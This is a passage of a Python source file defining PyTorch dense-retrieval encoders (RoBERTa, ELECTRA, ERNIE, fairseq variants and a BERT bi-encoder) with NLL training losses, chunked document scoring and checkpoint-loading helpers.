    def __init__(self, config, model_argobj=None):
        nn.Module.__init__(self)
        NLL_concat.__init__(self, model_argobj)
        self.encoder = TransformerSentenceEncoder(
            padding_idx=1,
            vocab_size=32769,
            num_encoder_layers=12,
            embedding_dim=768,
            ffn_embedding_dim=3072,
            num_attention_heads=12,
            dropout=0.1,
            attention_dropout=0.1,
            activation_dropout=0.0,
            layerdrop=0.0,
            max_seq_len=512,
            num_segments=0,
            encoder_normalize_before=True,
            apply_bert_init=True,
            activation_fn="gelu",
            q_noise=0.0,
            qn_block_size=8,
        )
        # Single output unit: the projection itself is the relevance logit.
        self.embeddingHead = nn.Linear(config.hidden_size, 1)
        self.apply(self._init_weights)

    def query_emb(self, input_ids, attention_mask):
        """Encode token ids and project the pooled representation to a logit."""
        # fairseq returns (inner_states, sentence_rep); last layer is [T, B, H].
        inner_states, _ = self.encoder(input_ids)
        hidden = inner_states[-1].transpose(0, 1)  # -> [B, T, H]
        pooled = self.masked_mean_or_first(hidden, attention_mask)
        return self.embeddingHead(pooled)

    def body_emb(self, input_ids, attention_mask):
        # Queries and passages share the same encoder.
        return self.query_emb(input_ids, attention_mask)

    def from_pretrained(self, model_path):
        """Load a fairseq pretraining checkpoint or a finetuned state dict."""
        model_dict = self.state_dict()
        save_model = torch.load(model_path, map_location=lambda storage, loc: storage)
        pretrained_dict = {}
        if 'model' in save_model.keys():
            # Pretraining checkpoint: keep encoder weights only (no LM head /
            # decoder) and remap 'encoder.sentence_encoder.*' -> 'encoder.*'
            # (the stripped prefix is 24 characters long).
            for name in save_model['model']:
                if 'lm_head' not in name and 'encoder' in name and 'decode' not in name:
                    pretrained_dict['encoder' + name[24:]] = save_model['model'][name]
            # Only the 2 head tensors (embeddingHead weight/bias) may be missing.
            assert len(model_dict) - 2 == len(pretrained_dict), (len(model_dict), len(pretrained_dict), model_dict.keys(), pretrained_dict.keys())
        else:
            # Finetuned state dict: strip the first 7 characters of every key
            # (presumably a 'module.' DataParallel prefix — confirm with the saver).
            for name in save_model:
                pretrained_dict[name[7:]] = save_model[name]
            assert len(model_dict) == len(pretrained_dict)
        print('load model.... ', len(model_dict), len(pretrained_dict))
        print(pretrained_dict.keys())
        model_dict.update(pretrained_dict)
        self.load_state_dict(model_dict)
class NLL_MultiChunk(EmbeddingMixin):
    """NLL loss over chunked documents: document score = max over chunks of q·chunk."""

    def forward(
            self,
            query_ids,
            attention_mask_q,
            input_ids_a=None,
            attention_mask_a=None,
            input_ids_b=None,
            attention_mask_b=None,
            is_query=True):
        # Inference: only one input present — just embed it.
        if input_ids_b is None and is_query:
            return self.query_emb(query_ids, attention_mask_q)
        elif input_ids_b is None:
            return self.body_emb(query_ids, attention_mask_q)

        q_embs = self.query_emb(query_ids, attention_mask_q)
        a_embs = self.body_emb(input_ids_a, attention_mask_a)
        b_embs = self.body_emb(input_ids_b, attention_mask_b)

        batchS, full_length = input_ids_a.size()
        chunk_factor = full_length // self.base_len

        logits_a = self._max_chunk_score(q_embs, a_embs, attention_mask_a, batchS, chunk_factor)
        logits_b = self._max_chunk_score(q_embs, b_embs, attention_mask_b, batchS, chunk_factor)

        logit_matrix = torch.cat(
            [logits_a.unsqueeze(1), logits_b.unsqueeze(1)], dim=1)  # [B, 2]
        lsm = F.log_softmax(logit_matrix, dim=1)
        loss = -1.0 * lsm[:, 0]
        return (loss.mean(),)

    def _max_chunk_score(self, q_embs, chunk_embs, attention_mask, batchS, chunk_factor):
        """Best dot-product score over a document's chunks, padded chunks masked out."""
        # A chunk is "real" iff its first token is attended to.
        chunk_valid = attention_mask.reshape(batchS, chunk_factor, -1)[:, :, 0]  # [batchS, chunk_factor]
        inverted_bias = ((1 - chunk_valid) * (-9999)).float()
        scores = torch.matmul(
            q_embs.unsqueeze(1), chunk_embs.transpose(1, 2))  # [batch, 1, chunk_factor]
        return (scores[:, 0, :] + inverted_bias).max(dim=-1, keepdim=False).values  # [batch]
class RobertaDot_NLL_LN(NLL, RobertaForSequenceClassification):
    """RoBERTa dot-product retriever: linear head + LayerNorm over the pooled state,
    trained with the pairwise NLL loss from `NLL`.
    """

    def __init__(self, config, model_argobj=None):
        NLL.__init__(self, model_argobj)
        RobertaForSequenceClassification.__init__(self, config)
        self.embeddingHead = nn.Linear(config.hidden_size, 768)
        self.norm = nn.LayerNorm(768)
        self.apply(self._init_weights)

    def query_emb(self, input_ids, attention_mask):
        """Encode token ids into a LayerNorm-ed 768-d embedding."""
        outputs = self.roberta(input_ids=input_ids,
                               attention_mask=attention_mask)
        pooled = self.masked_mean_or_first(outputs, attention_mask)
        return self.norm(self.embeddingHead(pooled))

    def body_emb(self, input_ids, attention_mask):
        # Queries and passages share one encoder.
        return self.query_emb(input_ids, attention_mask)
class ELECTRA_Dot_NLL_LN(NLL, ElectraForSequenceClassification):
    """ELECTRA dot-product retriever: linear head + LayerNorm over the pooled state,
    trained with the pairwise NLL loss from `NLL`.
    """

    def __init__(self, config, model_argobj=None):
        NLL.__init__(self, model_argobj)
        ElectraForSequenceClassification.__init__(self, config)
        self.embeddingHead = nn.Linear(768, 768)
        self.norm = nn.LayerNorm(768)
        self.apply(self._init_weights)

    def query_emb(self, input_ids, attention_mask):
        """Encode token ids into a LayerNorm-ed 768-d embedding."""
        outputs = self.electra(input_ids=input_ids,
                               attention_mask=attention_mask)
        pooled = self.masked_mean_or_first(outputs, attention_mask)
        return self.norm(self.embeddingHead(pooled))

    def body_emb(self, input_ids, attention_mask):
        # Queries and passages share one encoder.
        return self.query_emb(input_ids, attention_mask)
class ERNIE2Dot_NLL_LN(NLL, BertForSequenceClassification):
    """ERNIE 2.0 (BERT-architecture) dot-product retriever: linear head + LayerNorm,
    trained with the pairwise NLL loss from `NLL`.
    """

    def __init__(self, config, model_argobj=None):
        NLL.__init__(self, model_argobj)
        BertForSequenceClassification.__init__(self, config)
        self.embeddingHead = nn.Linear(768, 768)
        self.norm = nn.LayerNorm(768)
        self.apply(self._init_weights)

    def query_emb(self, input_ids, attention_mask):
        """Encode token ids into a LayerNorm-ed 768-d embedding."""
        outputs = self.bert(input_ids=input_ids,
                            attention_mask=attention_mask)
        pooled = self.masked_mean_or_first(outputs, attention_mask)
        return self.norm(self.embeddingHead(pooled))

    def body_emb(self, input_ids, attention_mask):
        # Queries and passages share one encoder.
        return self.query_emb(input_ids, attention_mask)
class RobertaDot_NLL_LN_fairseq(NLL, nn.Module):
    """Fairseq RoBERTa (standard 50265 vocab) dot-product retriever with
    linear head + LayerNorm, trained with the pairwise NLL loss from `NLL`.
    """

    def __init__(self, config, model_argobj=None):
        nn.Module.__init__(self)
        NLL.__init__(self, model_argobj)
        self.encoder = TransformerSentenceEncoder(
            padding_idx=1,
            vocab_size=50265,
            num_encoder_layers=12,
            embedding_dim=768,
            ffn_embedding_dim=3072,
            num_attention_heads=12,
            dropout=0.1,
            attention_dropout=0.1,
            activation_dropout=0.0,
            layerdrop=0.0,
            max_seq_len=512,
            num_segments=0,
            encoder_normalize_before=True,
            apply_bert_init=True,
            activation_fn="gelu",
            q_noise=0.0,
            qn_block_size=8,
        )
        self.embeddingHead = nn.Linear(config.hidden_size, 768)
        self.norm = nn.LayerNorm(768)
        self.apply(self._init_weights)

    def query_emb(self, input_ids, attention_mask):
        """Encode token ids into a LayerNorm-ed 768-d embedding."""
        # fairseq returns (inner_states, sentence_rep); last layer is [T, B, H].
        inner_states, _ = self.encoder(input_ids)
        hidden = inner_states[-1].transpose(0, 1)  # -> [B, T, H]
        pooled = self.masked_mean_or_first(hidden, attention_mask)
        return self.norm(self.embeddingHead(pooled))

    def body_emb(self, input_ids, attention_mask):
        # Queries and passages share one encoder.
        return self.query_emb(input_ids, attention_mask)

    def from_pretrained(self, model_path):
        """Load a fairseq pretraining checkpoint or a finetuned state dict."""
        model_dict = self.state_dict()
        save_model = torch.load(model_path, map_location=lambda storage, loc: storage)
        pretrained_dict = {}
        if 'model' in save_model.keys():
            # Pretraining checkpoint: drop LM-head / decoder weights and remap
            # 'encoder.sentence_encoder.*' -> 'encoder.*' (24-char prefix).
            for name in save_model['model']:
                if 'lm_head' not in name and 'decode' not in name:
                    pretrained_dict['encoder' + name[24:]] = save_model['model'][name]
            # embeddingHead + norm (4 tensors) are newly initialized, not loaded.
            assert len(model_dict) - 4 == len(pretrained_dict)
        else:
            # Finetuned state dict: strip the first 7 characters of every key
            # (presumably a 'module.' DataParallel prefix — confirm with the saver).
            for name in save_model:
                pretrained_dict[name[7:]] = save_model[name]
            assert len(model_dict) == len(pretrained_dict)
        print('load model.... ', len(model_dict), len(pretrained_dict))
        print(pretrained_dict.keys())
        model_dict.update(pretrained_dict)
        self.load_state_dict(model_dict)
class RobertaDot_NLL_LN_fairseq_fast_sentence(NLL, nn.Module):
    """Fairseq RoBERTa (fast 32769 vocab) dot-product retriever with
    linear head + LayerNorm, trained with the pairwise NLL loss from `NLL`.
    """

    def __init__(self, config, model_argobj=None):
        nn.Module.__init__(self)
        NLL.__init__(self, model_argobj)
        self.encoder = TransformerSentenceEncoder(
            padding_idx=1,
            vocab_size=32769,
            num_encoder_layers=12,
            embedding_dim=768,
            ffn_embedding_dim=3072,
            num_attention_heads=12,
            dropout=0.1,
            attention_dropout=0.1,
            activation_dropout=0.0,
            layerdrop=0.0,
            max_seq_len=512,
            num_segments=0,
            encoder_normalize_before=True,
            apply_bert_init=True,
            activation_fn="gelu",
            q_noise=0.0,
            qn_block_size=8,
        )
        self.embeddingHead = nn.Linear(config.hidden_size, 768)
        self.norm = nn.LayerNorm(768)
        self.apply(self._init_weights)

    def query_emb(self, input_ids, attention_mask):
        """Encode token ids into a LayerNorm-ed 768-d embedding."""
        # fairseq returns (inner_states, sentence_rep); last layer is [T, B, H].
        inner_states, _ = self.encoder(input_ids)
        hidden = inner_states[-1].transpose(0, 1)  # -> [B, T, H]
        pooled = self.masked_mean_or_first(hidden, attention_mask)
        return self.norm(self.embeddingHead(pooled))

    def body_emb(self, input_ids, attention_mask):
        # Queries and passages share one encoder.
        return self.query_emb(input_ids, attention_mask)

    def from_pretrained(self, model_path):
        """Load a fairseq pretraining checkpoint or a finetuned state dict."""
        model_dict = self.state_dict()
        save_model = torch.load(model_path, map_location=lambda storage, loc: storage)
        pretrained_dict = {}
        if 'model' in save_model.keys():
            # Pretraining checkpoint: keep encoder weights only (no LM head /
            # decoder) and remap 'encoder.sentence_encoder.*' -> 'encoder.*'
            # (the stripped prefix is 24 characters long).
            for name in save_model['model']:
                if 'lm_head' not in name and 'encoder' in name and 'decode' not in name:
                    pretrained_dict['encoder' + name[24:]] = save_model['model'][name]
            # embeddingHead + norm (4 tensors) are newly initialized, not loaded.
            assert len(model_dict) - 4 == len(pretrained_dict), (len(model_dict), len(pretrained_dict), model_dict.keys(), pretrained_dict.keys())
        else:
            # Finetuned state dict: strip the first 7 characters of every key
            # (presumably a 'module.' DataParallel prefix — confirm with the saver).
            for name in save_model:
                pretrained_dict[name[7:]] = save_model[name]
            assert len(model_dict) == len(pretrained_dict)
        print('load model.... ', len(model_dict), len(pretrained_dict))
        print(pretrained_dict.keys())
        model_dict.update(pretrained_dict)
        self.load_state_dict(model_dict)
class RobertaDot_NLL_LN_fairseq_fast(NLL, nn.Module):
    """Fairseq RoBERTa (fast 32769 vocab) dot-product retriever with
    linear head + LayerNorm, trained with the pairwise NLL loss from `NLL`.
    """

    def __init__(self, config, model_argobj=None):
        nn.Module.__init__(self)
        NLL.__init__(self, model_argobj)
        self.encoder = TransformerSentenceEncoder(
            padding_idx=1,
            vocab_size=32769,
            num_encoder_layers=12,
            embedding_dim=768,
            ffn_embedding_dim=3072,
            num_attention_heads=12,
            dropout=0.1,
            attention_dropout=0.1,
            activation_dropout=0.0,
            layerdrop=0.0,
            max_seq_len=512,
            num_segments=0,
            encoder_normalize_before=True,
            apply_bert_init=True,
            activation_fn="gelu",
            q_noise=0.0,
            qn_block_size=8,
        )
        self.embeddingHead = nn.Linear(config.hidden_size, 768)
        self.norm = nn.LayerNorm(768)
        self.apply(self._init_weights)

    def query_emb(self, input_ids, attention_mask):
        """Encode token ids into a LayerNorm-ed 768-d embedding."""
        # fairseq returns (inner_states, sentence_rep); last layer is [T, B, H].
        inner_states, _ = self.encoder(input_ids)
        hidden = inner_states[-1].transpose(0, 1)  # -> [B, T, H]
        # BUG FIX: removed leftover debug `print(outputs1)` that dumped the whole
        # hidden-state tensor to stdout on rank 0 at every forward call.
        full_emb = self.masked_mean_or_first(hidden, attention_mask)
        return self.norm(self.embeddingHead(full_emb))

    def body_emb(self, input_ids, attention_mask):
        # Queries and passages share one encoder.
        return self.query_emb(input_ids, attention_mask)

    def from_pretrained(self, model_path):
        """Load a fairseq pretraining checkpoint or a finetuned state dict."""
        model_dict = self.state_dict()
        save_model = torch.load(model_path, map_location=lambda storage, loc: storage)
        pretrained_dict = {}
        if 'model' in save_model.keys():
            # Pretraining checkpoint: keep encoder weights only (no LM head /
            # decoder) and remap 'encoder.sentence_encoder.*' -> 'encoder.*'
            # (the stripped prefix is 24 characters long).
            for name in save_model['model']:
                if 'lm_head' not in name and 'encoder' in name and 'decode' not in name:
                    pretrained_dict['encoder' + name[24:]] = save_model['model'][name]
            # embeddingHead + norm (4 tensors) are newly initialized, not loaded.
            assert len(model_dict) - 4 == len(pretrained_dict), (len(model_dict), len(pretrained_dict), model_dict.keys(), pretrained_dict.keys())
        else:
            print('load finetuned checkpoints...')
            # Finetuned state dict: strip the first 7 characters of every key
            # (presumably a 'module.' DataParallel prefix — confirm with the saver).
            for name in save_model:
                pretrained_dict[name[7:]] = save_model[name]
            assert len(model_dict) == len(pretrained_dict)
        print('load model.... ', len(model_dict), len(pretrained_dict))
        print(pretrained_dict.keys())
        model_dict.update(pretrained_dict)
        self.load_state_dict(model_dict)
class RobertaDot_NLL_LN_fairseq_fast_zero(NLL, nn.Module):
    """Fairseq RoBERTa dot-product retriever with the backbone frozen:
    only the projection head and LayerNorm remain trainable.
    """

    def __init__(self, config, model_argobj=None):
        nn.Module.__init__(self)
        NLL.__init__(self, model_argobj)
        self.encoder = TransformerSentenceEncoder(
            padding_idx=1,
            vocab_size=32769,
            num_encoder_layers=12,
            embedding_dim=768,
            ffn_embedding_dim=3072,
            num_attention_heads=12,
            dropout=0.1,
            attention_dropout=0.1,
            activation_dropout=0.0,
            layerdrop=0.0,
            max_seq_len=512,
            num_segments=0,
            encoder_normalize_before=True,
            apply_bert_init=True,
            activation_fn="gelu",
            q_noise=0.0,
            qn_block_size=8,
        )
        self.embeddingHead = nn.Linear(config.hidden_size, 768)
        self.norm = nn.LayerNorm(768)
        self.apply(self._init_weights)
        # Freeze every backbone parameter ('encoder.*'); head/norm stay trainable.
        for name, param in self.named_parameters():
            if name.startswith('encode'):
                print('fix: ', name)
                param.requires_grad = False

    def query_emb(self, input_ids, attention_mask):
        """Encode token ids into a LayerNorm-ed 768-d embedding."""
        # fairseq returns (inner_states, sentence_rep); last layer is [T, B, H].
        inner_states, _ = self.encoder(input_ids)
        hidden = inner_states[-1].transpose(0, 1)  # -> [B, T, H]
        pooled = self.masked_mean_or_first(hidden, attention_mask)
        return self.norm(self.embeddingHead(pooled))

    def body_emb(self, input_ids, attention_mask):
        # Queries and passages share one encoder.
        return self.query_emb(input_ids, attention_mask)

    def from_pretrained(self, model_path):
        """Load a fairseq pretraining checkpoint or a finetuned state dict."""
        model_dict = self.state_dict()
        save_model = torch.load(model_path, map_location=lambda storage, loc: storage)
        pretrained_dict = {}
        if 'model' in save_model.keys():
            # Pretraining checkpoint: keep encoder weights only (no LM head /
            # decoder) and remap 'encoder.sentence_encoder.*' -> 'encoder.*'
            # (the stripped prefix is 24 characters long).
            for name in save_model['model']:
                if 'lm_head' not in name and 'encoder' in name and 'decode' not in name:
                    pretrained_dict['encoder' + name[24:]] = save_model['model'][name]
            # embeddingHead + norm (4 tensors) are newly initialized, not loaded.
            assert len(model_dict) - 4 == len(pretrained_dict), (len(model_dict), len(pretrained_dict), model_dict, pretrained_dict)
        else:
            # Finetuned state dict: strip the first 7 characters of every key
            # (presumably a 'module.' DataParallel prefix — confirm with the saver).
            for name in save_model:
                pretrained_dict[name[7:]] = save_model[name]
            assert len(model_dict) == len(pretrained_dict)
        print('load model.... ', len(model_dict), len(pretrained_dict))
        print(pretrained_dict.keys())
        model_dict.update(pretrained_dict)
        self.load_state_dict(model_dict)
class RobertaDot_NLL_LN_fairseq_fast_3layer(NLL, nn.Module):
    """3-layer truncation of the fairseq RoBERTa dot-product retriever;
    only layers 0-2 of a 12-layer checkpoint are loaded.
    """

    def __init__(self, config, model_argobj=None):
        nn.Module.__init__(self)
        NLL.__init__(self, model_argobj)
        self.encoder = TransformerSentenceEncoder(
            padding_idx=1,
            vocab_size=32769,
            num_encoder_layers=3,
            embedding_dim=768,
            ffn_embedding_dim=3072,
            num_attention_heads=12,
            dropout=0.1,
            attention_dropout=0.1,
            activation_dropout=0.0,
            layerdrop=0.0,
            max_seq_len=512,
            num_segments=0,
            encoder_normalize_before=True,
            apply_bert_init=True,
            activation_fn="gelu",
            q_noise=0.0,
            qn_block_size=8,
        )
        self.embeddingHead = nn.Linear(config.hidden_size, 768)
        self.norm = nn.LayerNorm(768)
        self.apply(self._init_weights)

    def query_emb(self, input_ids, attention_mask):
        """Encode token ids into a LayerNorm-ed 768-d embedding."""
        # fairseq returns (inner_states, sentence_rep); last layer is [T, B, H].
        inner_states, _ = self.encoder(input_ids)
        hidden = inner_states[-1].transpose(0, 1)  # -> [B, T, H]
        pooled = self.masked_mean_or_first(hidden, attention_mask)
        return self.norm(self.embeddingHead(pooled))

    def body_emb(self, input_ids, attention_mask):
        # Queries and passages share one encoder.
        return self.query_emb(input_ids, attention_mask)

    def from_pretrained(self, model_path):
        """Load a fairseq pretraining checkpoint (layers 3-11 dropped) or a finetuned state dict."""
        model_dict = self.state_dict()
        save_model = torch.load(model_path, map_location=lambda storage, loc: storage)
        pretrained_dict = {}
        if 'model' in save_model.keys():
            # Weights belonging to encoder layers 3..11 are not part of this
            # 3-layer model and must be skipped.
            dropped_layer_tags = tuple('layers.' + str(layer_i) for layer_i in range(3, 12))
            # Keep encoder weights only (no LM head / decoder) and remap
            # 'encoder.sentence_encoder.*' -> 'encoder.*' (24-char prefix).
            for name in save_model['model']:
                if 'lm_head' not in name and 'encoder' in name and 'decode' not in name:
                    if not any(tag in name for tag in dropped_layer_tags):
                        pretrained_dict['encoder' + name[24:]] = save_model['model'][name]
            # embeddingHead + norm (4 tensors) are newly initialized, not loaded.
            assert len(model_dict) - 4 == len(pretrained_dict), (len(model_dict), len(pretrained_dict), model_dict, pretrained_dict)
        else:
            # Finetuned state dict: strip the first 7 characters of every key
            # (presumably a 'module.' DataParallel prefix — confirm with the saver).
            for name in save_model:
                pretrained_dict[name[7:]] = save_model[name]
            assert len(model_dict) == len(pretrained_dict)
        print('load model.... ', len(model_dict), len(pretrained_dict))
        print(pretrained_dict.keys())
        model_dict.update(pretrained_dict)
        self.load_state_dict(model_dict)
class RobertaDot_NLL_LN_fairseq_fast2(NLL, nn.Module):
    """6-layer fairseq RoBERTa dot-product retriever with linear head + LayerNorm,
    trained with the pairwise NLL loss from `NLL`.
    """

    def __init__(self, config, model_argobj=None):
        nn.Module.__init__(self)
        NLL.__init__(self, model_argobj)
        self.encoder = TransformerSentenceEncoder(
            padding_idx=1,
            vocab_size=32769,
            num_encoder_layers=6,
            embedding_dim=768,
            ffn_embedding_dim=3072,
            num_attention_heads=12,
            dropout=0.1,
            attention_dropout=0.1,
            activation_dropout=0.0,
            layerdrop=0.0,
            max_seq_len=512,
            num_segments=0,
            encoder_normalize_before=True,
            apply_bert_init=True,
            activation_fn="gelu",
            q_noise=0.0,
            qn_block_size=8,
        )
        self.embeddingHead = nn.Linear(config.hidden_size, 768)
        self.norm = nn.LayerNorm(768)
        self.apply(self._init_weights)

    def query_emb(self, input_ids, attention_mask):
        """Encode token ids into a LayerNorm-ed 768-d embedding."""
        # fairseq returns (inner_states, sentence_rep); last layer is [T, B, H].
        inner_states, _ = self.encoder(input_ids)
        hidden = inner_states[-1].transpose(0, 1)  # -> [B, T, H]
        pooled = self.masked_mean_or_first(hidden, attention_mask)
        return self.norm(self.embeddingHead(pooled))

    def body_emb(self, input_ids, attention_mask):
        # Queries and passages share one encoder.
        return self.query_emb(input_ids, attention_mask)

    def from_pretrained(self, model_path):
        """Load a fairseq pretraining checkpoint or a finetuned state dict."""
        model_dict = self.state_dict()
        save_model = torch.load(model_path, map_location=lambda storage, loc: storage)
        pretrained_dict = {}
        if 'model' in save_model.keys():
            # Pretraining checkpoint: keep encoder weights only (no LM head /
            # decoder) and remap 'encoder.sentence_encoder.*' -> 'encoder.*'
            # (the stripped prefix is 24 characters long).
            for name in save_model['model']:
                if 'lm_head' not in name and 'encoder' in name and 'decode' not in name:
                    pretrained_dict['encoder' + name[24:]] = save_model['model'][name]
            # embeddingHead + norm (4 tensors) are newly initialized, not loaded.
            assert len(model_dict) - 4 == len(pretrained_dict), (len(model_dict), len(pretrained_dict), model_dict, pretrained_dict)
        else:
            # Finetuned state dict: strip the first 7 characters of every key
            # (presumably a 'module.' DataParallel prefix — confirm with the saver).
            for name in save_model:
                pretrained_dict[name[7:]] = save_model[name]
            assert len(model_dict) == len(pretrained_dict)
        print('load model.... ', len(model_dict), len(pretrained_dict))
        print(pretrained_dict.keys())
        model_dict.update(pretrained_dict)
        self.load_state_dict(model_dict)
class RobertaDot_CLF_ANN_NLL_MultiChunk(NLL_MultiChunk, RobertaDot_NLL_LN):
    """Multi-chunk RoBERTa retriever: long documents are split into 512-token
    chunks and each chunk is embedded independently.
    """

    def __init__(self, config):
        RobertaDot_NLL_LN.__init__(self, config)
        self.base_len = 512

    def body_emb(self, input_ids, attention_mask):
        """Embed every 512-token chunk of each document.

        Returns a tensor of size [batchS, chunk_factor, embeddingS].
        """
        batchS, full_length = input_ids.size()
        chunk_factor = full_length // self.base_len
        chunk_len = full_length // chunk_factor

        # [B, full_length] -> [B * chunk_factor, chunk_len] so chunks go
        # through the encoder as independent sequences.
        input_seq = input_ids.reshape(
            batchS, chunk_factor, chunk_len).reshape(
            batchS * chunk_factor, chunk_len)
        attention_mask_seq = attention_mask.reshape(
            batchS, chunk_factor, chunk_len).reshape(
            batchS * chunk_factor, chunk_len)

        outputs_k = self.roberta(input_ids=input_seq,
                                 attention_mask=attention_mask_seq)
        compressed_output_k = self.embeddingHead(outputs_k[0])  # [batch, len, dim]
        # Keep only each chunk's CLS token, then LayerNorm it.
        compressed_output_k = self.norm(compressed_output_k[:, 0, :])

        batch_expand, embeddingS = compressed_output_k.size()
        return compressed_output_k.reshape(
            batchS, chunk_factor, embeddingS)  # size [batchS, chunk_factor, embeddingS]
class RobertaDot_CLF_ANN_NLL_MultiChunk_fairseq_fast(NLL_MultiChunk, RobertaDot_NLL_LN_fairseq_fast):
    """Multi-chunk variant of the fairseq retriever: long documents are split
    into 512-token chunks and each chunk is embedded independently.
    """

    def __init__(self, config):
        RobertaDot_NLL_LN_fairseq_fast.__init__(self, config)
        self.base_len = 512

    def body_emb(self, input_ids, attention_mask):
        """Embed every 512-token chunk of each document.

        Returns a tensor of size [batchS, chunk_factor, embeddingS].
        """
        batchS, full_length = input_ids.size()
        chunk_factor = full_length // self.base_len
        chunk_len = full_length // chunk_factor

        # [B, full_length] -> [B * chunk_factor, chunk_len]; the fairseq encoder
        # is called without an explicit attention mask here.
        input_seq = input_ids.reshape(
            batchS, chunk_factor, chunk_len).reshape(
            batchS * chunk_factor, chunk_len)

        # fairseq returns (inner_states, sentence_rep); last layer is [T, B, H].
        inner_states, _ = self.encoder(input_seq)
        hidden = inner_states[-1].transpose(0, 1)  # -> [B, T, H]

        compressed_output_k = self.embeddingHead(hidden)  # [batch, len, dim]
        # Keep only each chunk's first-token representation, then LayerNorm it.
        compressed_output_k = self.norm(compressed_output_k[:, 0, :])

        batch_expand, embeddingS = compressed_output_k.size()
        return compressed_output_k.reshape(
            batchS, chunk_factor, embeddingS)  # size [batchS, chunk_factor, embeddingS]
class HFBertEncoder(BertModel):
    """HuggingFace BERT wrapper returning (sequence_output, cls_pooled, hidden_states)."""

    def __init__(self, config):
        BertModel.__init__(self, config)
        assert config.hidden_size > 0, 'Encoder hidden_size can\'t be zero'
        self.init_weights()

    @classmethod
    def init_encoder(cls, args, dropout: float = 0.1):
        """Build a bert-base-uncased encoder with the given dropout.

        Note: `args` is accepted for interface compatibility but unused here.
        """
        cfg = BertConfig.from_pretrained("bert-base-uncased")
        if dropout != 0:
            cfg.attention_probs_dropout_prob = dropout
            cfg.hidden_dropout_prob = dropout
        return cls.from_pretrained("bert-base-uncased", config=cfg)

    def forward(self, input_ids, attention_mask):
        hidden_states = None
        sequence_output, pooled_output = super().forward(input_ids=input_ids,
                                                         attention_mask=attention_mask)
        # Use the [CLS] token representation instead of BERT's tanh pooler output.
        pooled_output = sequence_output[:, 0, :]
        return sequence_output, pooled_output, hidden_states

    def get_out_size(self):
        """Output dimensionality: projection size if a head exists, else hidden_size."""
        # BUG FIX: `self.encode_proj` is never assigned anywhere in this class, so
        # the original bare attribute access always raised AttributeError.
        encode_proj = getattr(self, 'encode_proj', None)
        if encode_proj:
            return encode_proj.out_features
        return self.config.hidden_size
class BiEncoder(nn.Module):
    """ Bi-Encoder model component. Encapsulates query/question and context/passage encoders.
    """

    def __init__(self, args):
        super(BiEncoder, self).__init__()
        self.question_model = HFBertEncoder.init_encoder(args)
        self.ctx_model = HFBertEncoder.init_encoder(args)

    def query_emb(self, input_ids, attention_mask):
        """CLS-pooled embedding from the question encoder."""
        _, pooled_output, _ = self.question_model(input_ids, attention_mask)
        return pooled_output

    def body_emb(self, input_ids, attention_mask):
        """CLS-pooled embedding from the context encoder."""
        _, pooled_output, _ = self.ctx_model(input_ids, attention_mask)
        return pooled_output

    def forward(self, query_ids, attention_mask_q, input_ids_a=None, attention_mask_a=None, input_ids_b=None, attention_mask_b=None):
        q_embs = self.query_emb(query_ids, attention_mask_q)
        a_embs = self.body_emb(input_ids_a, attention_mask_a)
        # Inference: no negative passage — return the raw embeddings.
        if input_ids_b is None:
            return (q_embs, a_embs)
        b_embs = self.body_emb(input_ids_b, attention_mask_b)
        # Dot-product scores; column 0 is the positive passage.
        pos_scores = (q_embs * a_embs).sum(-1).unsqueeze(1)
        neg_scores = (q_embs * b_embs).sum(-1).unsqueeze(1)
        logit_matrix = torch.cat([pos_scores, neg_scores], dim=1)  # [B, 2]
        lsm = F.log_softmax(logit_matrix, dim=1)
        loss = -1.0 * lsm[:, 0]
        return (loss.mean(),)
class RobertaEncoderFast(nn.Module):
    """Fairseq RoBERTa encoder for DPR-style bi-encoders.

    Returns (sequence_output, pooled_output, None) from forward; the pooled
    output is the representation at `representation_token_pos`.
    """

    def __init__(self, dropout: float = 0.1):
        super(RobertaEncoderFast, self).__init__()
        self.fairseq_roberta = TransformerSentenceEncoder(
            padding_idx=1,
            vocab_size=32769,
            num_encoder_layers=12,
            embedding_dim=768,
            ffn_embedding_dim=3072,
            num_attention_heads=12,
            dropout=0.1,
            attention_dropout=0.1,
            activation_dropout=0.0,
            layerdrop=0.0,
            max_seq_len=512,
            num_segments=0,
            encoder_normalize_before=True,
            apply_bert_init=True,
            activation_fn="gelu",
            q_noise=0.0,
            qn_block_size=8,
        )
        # NOTE(review): no projection head (`encode_proj`) is defined on this class;
        # from_pretrained()/get_out_size() treat a missing attribute as "no projection".
        from fairseq.modules.transformer_sentence_encoder import init_bert_params
        self.apply(init_bert_params)

    def from_pretrained(self, model_path: str):
        """Load a fairseq pretraining checkpoint or a finetuned state dict."""
        model_dict = self.state_dict()
        save_model = torch.load(model_path, map_location=lambda storage, loc: storage)
        pretrained_dict = {}
        if 'model' in save_model.keys():
            # Pretraining checkpoint: keep encoder weights only (no LM head /
            # decoder) and remap 'encoder.sentence_encoder.*' ->
            # 'fairseq_roberta.*' (the stripped prefix is 24 characters long).
            for name in save_model['model']:
                if 'lm_head' not in name and 'encoder' in name and 'decode' not in name:
                    pretrained_dict['fairseq_roberta' + name[24:]] = save_model['model'][name]
            # BUG FIX: `self.encode_proj` is never assigned (it only exists as
            # commented-out code), so the original bare attribute access raised
            # AttributeError on this load path; use getattr with a default.
            if not getattr(self, 'encode_proj', None):
                assert len(model_dict) == len(pretrained_dict), (len(model_dict), len(pretrained_dict), model_dict.keys(), pretrained_dict.keys())
        else:
            print('load finetuned checkpoints...')
            # Finetuned state dict: strip the first 7 characters of every key
            # (presumably a 'module.' DataParallel prefix — confirm with the saver).
            for name in save_model:
                pretrained_dict[name[7:]] = save_model[name]
            assert len(model_dict) == len(pretrained_dict)
        print('load model.... ', len(model_dict), len(pretrained_dict))
        print(pretrained_dict.keys())
        model_dict.update(pretrained_dict)
        self.load_state_dict(model_dict)

    def forward(self, input_ids, attention_mask=None, representation_token_pos=0) -> Tuple[T, ...]:
        """Encode and pool at `representation_token_pos` (int, or per-row position tensor)."""
        # fairseq returns (inner_states, sentence_rep); last layer is [T, B, H].
        roberta_out, _ = self.fairseq_roberta(input_ids)
        roberta_out = roberta_out[-1].transpose(0, 1)  # -> [B, T, H]
        if isinstance(representation_token_pos, int):
            cls_out = roberta_out[:, representation_token_pos, :]
        else:  # treat as a tensor of per-example positions (column 1 holds the index)
            bsz = roberta_out.size(0)
            assert (
                representation_token_pos.size(0) == bsz
            ), "query bsz={} while representation_token_pos bsz={}".format(
                bsz, representation_token_pos.size(0)
            )
            cls_out = torch.stack(
                [
                    roberta_out[i, representation_token_pos[i, 1], :]
                    for i in range(bsz)
                ]
            )
        return roberta_out, cls_out, None

    def get_out_size(self):
        """Output dimensionality: projection size if a head exists, else 768."""
